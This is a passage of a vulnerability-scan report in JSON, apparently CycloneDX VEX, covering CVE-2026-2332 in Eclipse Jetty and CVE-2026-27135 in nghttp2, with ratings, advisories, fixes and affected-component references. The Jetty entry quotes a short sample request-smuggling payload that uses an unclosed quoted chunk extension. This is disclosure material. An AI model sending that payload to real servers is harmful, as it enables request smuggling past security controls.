          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n  *  https://w4ke.info/2025/06/18/funky-chunks.html\n\n  *  https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at\u00a0\\r\\n\u00a0inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-http to version 12.1.7, 12.0.33, 11.0.28, 10.0.28, 9.4.60",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2332"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2332"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2332"
        },
        {
          "url": "https://w4ke.info/2025/06/18/funky-chunks.html"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2332"
        }
      ],
      "published": "2026-04-14T12:16:21+00:00",
      "updated": "2026-05-01T13:31:00+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-27135",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        617
      ],
      "description": "nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library is meant to stop reading incoming data once the user-facing public API `nghttp2_session_terminate_session` or `nghttp2_session_terminate_session2` has been called by the application; the library may also call these functions internally when it detects a condition that is treated as a connection error. Prior to version 1.68.1, because of a missing internal state validation, the library keeps reading the rest of the data after one of those APIs is called, and a subsequent malformed frame that triggers FRAME_SIZE_ERROR then causes an assertion failure. nghttp2 v1.68.1 adds the missing state validation to avoid the assertion failure. No known workarounds are available.",
      "recommendation": "Upgrade libnghttp2 to version 1.43.0-6.el9_7.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27135"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/20/3"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7896"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27135"
        },
        {
          "url": "https://bugzilla.redhat.com/2441268"
        },
        {
          "url": "https://bugzilla.redhat.com/2442922"
        },
        {
          "url": "https://bugzilla.redhat.com/2448754"
        },
        {
          "url": "https://bugzilla.redhat.com/2453151"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448754"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-7896.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:7668"
        },
        {
          "url": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1"
        },
        {
          "url": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-27135.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-8339.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8233-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8233-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27135"
        }
      ],
      "published": "2026-03-18T18:16:26+00:00",
      "updated": "2026-03-23T17:51:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.43.0-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
